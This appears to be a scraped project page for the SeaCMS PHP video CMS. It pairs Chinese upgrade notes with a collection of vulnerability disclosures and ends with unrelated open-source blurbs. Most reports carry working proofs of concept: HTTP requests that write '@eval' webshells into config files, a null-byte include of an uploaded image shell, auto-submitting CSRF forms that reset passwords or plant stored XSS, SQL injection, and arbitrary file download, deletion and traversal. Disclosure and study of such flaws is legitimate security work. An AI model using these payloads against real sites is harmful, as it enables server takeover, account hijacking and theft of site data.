海洋cms 海洋影视管理系统 - 免费开源PHP
由于SEACMS.NET被盗,随时可能会出现安全问题,特更换域名SEACMS.COM。
新增后台视频筛选按周期筛选
修复视频列表页包含隐藏数据时,页数不正确的问题
修复文章列表页包含隐藏数据时,页数不正确的问题
修复部分情况下页面数据查询错误
修复rel=y标签调用隐藏数据的错误
修复Dplayer无法播放包含中文的视频url错误
修复CKplayr无法加载hls插件的错误
修复专题插入文章时,搜索后文章id参数丢失的错误
优化部分代码执行效率
【第①步】修改admin目录为你的实际后台目录,覆盖上传升级文件
【第②步】更新缓存
① ① 本升级包仅支持v12.9版本升级到v13,其它版本请勿使用!
A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the SeaCms V12.9.
Multiple reflective XSS vulnerabilities were discovered in \js\player\dmplayer\play\index.php.
We discovered that Seacms has very strict policies for front-end functionalities, frequently incorporating methods from filter.inc.php ,filter_input, webscan.php, and replace to filter inputs, which has addressed most potential vulnerabilities.
After careful consideration, we have limited this vulnerability to versions before V12.9, as V13 introduced the WEBSCAN module with very strict filtering. This might limit payload execution to a single 2-click scenario. Only in versions prior to V12.9 can a complete exploit chain be constructed for this vulnerability.
In \js\player\dmplayer\play\index.php, we found multiple reflective XSS vulnerabilities, such as with the color, vid, and url parameters.
For the color parameter, code injection can be achieved by closing the preceding <style> tag with </style>. For the vid and url parameters, code injection can be achieved by closing the preceding <script> tag with </script>.
One might ask why these files do not incorporate filter.inc.php. I speculate this might be because they use a third-party player called "ChaoFang Bilibili Danmu Player."
The vul of seacms_v12.6_xss
affected source code file: seacms-master/ass.php
affected function: search of home page
affected executabe: seacms-master/ass.php
The ways to trigger vulnerabilities:
input:
in the search box
and than the event of XSSPop-up window happend.
Analysis the resource code file:
in seacms-master/ass.php
The input data enters variable $wd:
When $wd is Not empty, it will be printed
This series of steps come down,but the data been not filtered.
On lines 5-26
When action=set
The variable $notify1 takes the value from the post array and writes it to the '/ data / admin / notify. php' file as PHP code
Try closing the preceding double quotation marks with double quotation marks to write PHP code
Enter the data like
“?><?
visit http://172.20.10.2/SeaCMS/Upload/data/admin/notify.php can getshell!
There is code injection vulnerability in admin_weixin.php. Malicious code can be injected into /data/admin/weixin.php, which can result in remote code execution.
click save button
if($action=="set")
{
$notify1= $_POST['notify1'];
$notify2= $_POST['notify2'];
$notify3= $_POST['notify3'];
$open=fopen("../data/admin/notify.php","w" );
$str='<?php ';
$str.='$notify1 = "';
$str.="$notify1";
$str.='"; ';
$str.='$notify2 = "';
$str.="$notify2";
$str.='"; ';
$str.='$notify3 = "';
$str.="$notify3";
$str.='"; ';
$str.=" ?>";
fwrite($open,$str);
fclose($open);
ShowMsg("成功保存设置!","admin_notify.php");
exit;
}POC
POST /cxxqv7/admin_notify.php?action=set HTTP/1.1
Host: host
Content-Length: 68
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: deviceid=1722062988348; xinhu_ca_rempass=0; xinhu_mo_adminid=yy0nm0mjj0mjn0vy0mmj0vk0mmn0mjm0iq0mjz0mjz0iv0vi0iu0nv07; xinhu_ca_adminuser=rock; WS_ADMIN_URL=ws://demo.com/notice; WS_CHAT_URL=ws://demo.com/msg; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D; PHPSESSID=ai3g0dn9ta148eftpns69215jd
Connection: keep-alive
notify1=%22%3B%40eval%28%24_POST%5B1%5D%29%3B%22¬ify2=1¬ify3=1
Access the location where the danger function is saved and exploited
Vulnerability conditions:
1、The php version must be less than 5.3.4
2、The magic_quotes_gpc in php.ini is set to Off
http://127.0.0.1/seacms-master/admin/admin_video.php?action=add
Upload a picture shell in the background first,remember the path at this time
Then visit http://127.0.0.1/seacms-master/admin/ebak/phomebak.php?phome=BakExe&mypath=../../../../uploads/editor/image/20210725/20210725190234_79191.jpg%00
You can see that the php code was successfully executed
A Cross-Site Request Forgery (CSRF) vulnerability has been identified in SeaCms V13.0. This vulnerability allows an attacker to change a user's password without their consent by tricking them into visiting a malicious webpage.
POST /member.php?action=chgpwdsubmit HTTP/1.1
Host: your-ip
Content-Length: 56
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h8inlct2j4b5efgecbfn6r5smr
Connection: close
[email protected]&nickname=&newpwd=Hebing123&newpwd2=Hebing123
<html>
<body>
<form action="http://your-ip/member.php?action=chgpwdsubmit" method="POST">
<input type="hidden" name="email" value="x@x.x" />
<input type="hidden" name="nickname" value="" />
<input type="hidden" name="newpwd" value="Hebing123" />
<input type="hidden" name="newpwd2" value="Hebing123" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
By storing the above HTML code on any webpage, if a user visits the page, their password will be changed to "Hebing123" without their knowledge.
Due to the mechanism where the page returns to the previous page after personal information is modified, an attacker can not only change the password but also modify any other parameters and values, allowing for multiple attacks.
SeaCMS V210419 (2021-04-19) allows an authenticated user to delete arbitrary files in web root directory, which may cause a denial of service attack.
POC
http://192.168.254.128:8097/Sea/Upload/admin/admin_template.php?action=del&filedir=../templets/default/../../../upload/aaa.php
SeaCms V12.9 contains multiple stored XSS vulnerabilities originating from insufficient filtering of several configuration variables in data.php related to $yzm. These vulnerabilities can be exploited through the js/player/dmplayer/admin/post.php?act=setting endpoint, where multiple configuration variables within $yzm can be set.
While the settings for the danmaku (bullet screen) system can only be modified by an administrator due to the inclusion of login.inc.php, the URL for the danmaku backend is fixed and lacks CSRF tokens. This makes it possible for attackers to exploit these XSS vulnerabilities through CSRF attacks. When an administrator opens a malicious link, the entire danmaku system of the site can be severely affected.
By modifying the yzm.dmrule configuration value to "><script>alert(1)</script><svg onload=alert(1)>, this XSS vulnerability will affect multiple pages, severely compromising the site's danmaku system. For example, the vulnerabilities can impact:
As a result, any user viewing any video on the SeaCms site in bilibili danmaku player will trigger the XSS vulnerability. This is because the js/player/dmplayer/player/js/setting.js script directly concatenates yzm.dmrule into an <a> tag.
POST /js/player/dmplayer/admin/post.php?act=setting HTTP/1.1
Host: 192.168.0.10:1045
Content-Length: 981
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.10:1045
Referer: http://192.168.0.10:1045/js/player/dmplayer/admin/?act=1
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [admin's Cookie]
Connection: close
yzm%5Bdanmuon%5D=on&yzm%5Bads%5D%5Bset%5D%5Bgroup%5D="><svg%20onload=alert(document.cookie)>&yzm%5Bcolor%5D="><svg%20onload=alert(document.cookie)>&yzm%5Blogo%5D="><svg%20onload=alert(document.cookie)>F&yzm%5Btrytime%5D=999999&yzm%5Bwaittime%5D=5&yzm%5Bsendtime%5D=5&yzm%5Bdmrule%5D="><script>alert(1)</script><svg%20onload=alert(document.cookie)>&yzm%5Bpbgjz%5D="><svg%20onload=alert(document.cookie)>&yzm%5Bjzuser%5D=&edit=1&yzm%5Bads%5D%5Bset%5D%5Bstate%5D=1&yzm%5Bads%5D%5Bset%5D%5Bpic%5D%5Btime%5D=20&yzm%5Bads%5D%5Bset%5D%5Bpic%5D%5Bimg%5D="><svg%20onload=alert(document.cookie)>&yzm%5Bads%5D%5Bset%5D%5Bpic%5D%5Blink%5D="><svg%20onload=alert(document.cookie)>&yzm%5Bads%5D%5Bset%5D%5Bvod%5D%5Burl%5D="><svg%20onload=alert(document.cookie)>&yzm%5Bads%5D%5Bset%5D%5Bvod%5D%5Blink%5D="><svg%20onload=alert(document.cookie)>&yzm%5Bads%5D%5Bpause%5D%5Bpic%5D="><svg%20onload=alert(document.cookie)>&yzm%5Bads%5D%5Bpause%5D%5Blink%5D="><svg%20onload=alert(document.cookie)>&edit=1
<html>
<body>
<form action="http://your-ip/js/player/dmplayer/admin/post.php?act=setting" method="POST">
<input type="hidden" name="yzm[danmuon]" value="on" />
<input type="hidden" name="yzm[ads][set][group]" value=""><svg onload=alert(document.cookie)>" />
<input type="hidden" name="yzm[color]" value=""><svg onload=alert(document.cookie)>" />
<input type="hidden" name="yzm[logo]" value=""><svg onload=alert(document.cookie)>F" />
<input type="hidden" name="yzm[trytime]" value="999999" />
<input type="hidden" name="yzm[waittime]" value="5" />
<input type="hidden" name="yzm[sendtime]" value="5" />
<input type="hidden" name="yzm[dmrule]" value=""><script>alert(1)</script><svg onload=alert(document.cookie)>" />
<input type="hidden" name="yzm[pbgjz]" value=""><svg onload=alert(document.cookie)>" />
<input type="hidden" name="yzm[jzuser]" value="" />
<input type="hidden" name="edit" value="1" />
<input type="hidden" name="yzm[ads][set][state]" value="1" />
<input type="hidden" name="yzm[ads][set][pic][time]" value="20" />
<input type="hidden" name="yzm[ads][set][pic][img]" value=""><svg onload=alert(document.cookie)>" />
<input type="hidden" name="yzm[ads][set][pic][link]" value=""><svg onload=alert(document.cookie)>" />
<input type="hidden" name="yzm[ads][set][vod][url]" value=""><svg onload=alert(document.cookie)>" />
<input type="hidden" name="yzm[ads][set][vod][link]" value=""><svg onload=alert(document.cookie)>" />
<input type="hidden" name="yzm[ads][pause][pic]" value=""><svg onload=alert(document.cookie)>" />
<input type="hidden" name="yzm[ads][pause][link]" value=""><svg onload=alert(document.cookie)>" />
<input type="hidden" name="edit" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Attackers can place the Attack POC as an HTML file on a server. When an administrator opens the file, it will send a POST request that disrupts the bilibili danmaku player.
V210202 首页的“管理影片”和 数据页的“数据管理”,检索不到内容
A SQL injection vulnerability in SeaCMS V210419 (2021-04-19) via the v_type_extra[] parameter in an edit action to admin_video.php.
http://192.168.254.128:8097/Sea/Upload/admin/admin_video.php?action=save&acttype=edit
POC: sleep(10)
sqlmap
POC:
POST /6dd5c2/ebak/phomebak.php?phome=DoEbak HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/6dd5c2/ebak/phomebak.php?phome=BakExeT&t=0&s=0&p=0&mypath=test_20200508171650&waitbaktime=0
Cookie: Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1586935647,1586945215; PHPSESSID=4pumfl3815cbo5e681haaja190
Upgrade-Insecure-Requests: 1
mydbname=test"&tablename[0]=test";phpinfo();?>&readme=test&filesize=0&baktype=1&bakline=1&mypath=qwe
Proof:
In '/Upload/admin/admin_notify.php' lines 5 to 26
When action=set
The variable $notify1 takes the value from the post array and writes it to the '/ data / admin / notify. PHP' file as PHP code
Try closing the preceding double quotation marks with double quotation marks to write PHP code
Construct payload variable $notify1 = "? > <?
Arbitrary code can be executed
A xss vulnerability was discovered in seacms v12.6
There is a stored XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the v_company and v_tvsparameter of /azdorq/admin_video.php?action=save&acttype=asdd
POC
1"><script>alert(1)</script>
`POST /azdorq/admin_video.php?action=save&acttype=add HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/5.4.1 NetType/WIFI
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 648
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/azdorq/admin_video.php?action=add
Cookie: PHPSESSID=r8f7t3j9g41831ljekha8qbs6r; XDEBUG_SESSION=PHPSTORM; XLA_CI=a76a0d5d5f24d8e3bd55503a099c8013
Upgrade-Insecure-Requests: 1
v_commend=0&v_name=asdd&v_enname=11&v_color=&v_type=8&v_state=&v_pic=&v_spic=&v_gpic=&v_actor=&v_director=&v_commend=0&v_note=&v_tags=&select3=&v_publishyear=&select2=&v_lang=&select1=&v_publisharea=&select4=&v_ver=&v_hit=0&v_monthhit=0&v_weekhit=0&v_dayhit=0&v_digg=0&v_tread=0&v_len=&v_total=&v_nickname=&v_company=1%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&v_tvs=1%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&v_douban=&v_mtime=&v_imdb=&v_score=&v_scorenum=&v_longtxt=&v_psd=&v_try=0&v_money=0&v_vip=&v_playfrom%5B1%5D=&v_playurl%5B1%5D=&m_downfrom%5B1%5D=&m_downurl%5B1%5D=&v_content=%3Cbr+%2F%3E&Submit=%E7%A1%AE%E5%AE%9A%E6%8F%90%E4%BA%A4`
1、choose this part and write poc to form
2、submit and view webpage
page: admin/admin_config_mark.php
using burp to change the data pack
poc
POST /admin-1/admin_config_mark.php?dopost=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------39083518262036147481608589166
Content-Length: 42680
Origin: http://localhost
Connection: close
Referer: http://localhost/admin-1/admin_config_mark.php
Cookie: PHPSESSID=v8e04d7hubkrhn5v329p0td38e; XDEBUG_SESSION=XDEBUG_ECLIPSE
Upgrade-Insecure-Requests: 1
-----------------------------39083518262036147481608589166
Content-Disposition: form-data; name="photo_markimg"
-----------------------------39083518262036147481608589166
Content-Disposition: form-data; name="photo_markup"
0
-----------------------------39083518262036147481608589166
Content-Disposition: form-data; name="photo_markdown"
0
-----------------------------39083518262036147481608589166
Content-Disposition: form-data; name="photo_marktype"
0
-----------------------------39083518262036147481608589166
Content-Disposition: form-data; name="photo_wwidth"
'
-----------------------------39083518262036147481608589166
Content-Disposition: form-data; name="photo_wheight"
;@eval($_REQUEST[cmd]);#
-----------------------------39083518262036147481608589166
Content-Disposition: form-data; name="newimg"; filename="123.png"
Content-Type: image/png
�PNG
�
-----------------------------39083518262036147481608589166
Content-Disposition: form-data; name="photo_watertext"
-----------------------------39083518262036147481608589166
Content-Disposition: form-data; name="photo_fontsize"
-----------------------------39083518262036147481608589166
Content-Disposition: form-data; name="photo_fontcolor"
-----------------------------39083518262036147481608589166
Content-Disposition: form-data; name="photo_marktrans"
-----------------------------39083518262036147481608589166
Content-Disposition: form-data; name="photo_diaphaneity"
-----------------------------39083518262036147481608589166
Content-Disposition: form-data; name="photo_waterpos"
0
-----------------------------39083518262036147481608589166
Content-Disposition: form-data; name="Submit"
确认提交
-----------------------------39083518262036147481608589166--
then access WWW/data/mark/inc_photowatermark_config.php?cmd=phpinfo(); to get webshell
SeaCMS V210419 (2021-04-19) has an arbitrary file download vulnerability, which can be exploited by attackers to obtain sensitive information.The attack can be achieved by using absolute or relative paths.
POC
Absolute path
http://192.168.254.128:8097/Sea/Upload/admin/admin_safe.php?action=download&file=C:/windows/win.ini
Relative path(Take downloading the current page /admin_safe.php as an example.)
http://192.168.254.128:8097/Sea/Upload/admin/admin_safe.php?action=download&file=admin_safe.php
There is no verification permission for this file
http://xxx.com/js/player/dmplayer/dmku/index.php
In line 50, "ac" is passed in through the GET method, the value of ac is "so", and the logic judgment is entered. The parameter key is passed into the function without any filtering: 搜索弹幕
In the function "搜索弹幕", the parameter key is also brought into the "搜索_弹幕池" without any filtering.
In the function "搜索_弹幕池", the key is directly spliced into the SQL query statement and causes sql injection.
Sqlmap:
Directory traversal in SeaCMS V210419 (2021-04-19) allows ../templets/default/../../../../../ directory traversal to read files.
POC
http://192.168.254.128:8097/Sea/Upload/admin/admin_template.php?path=../templets/default/../../../../../
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.
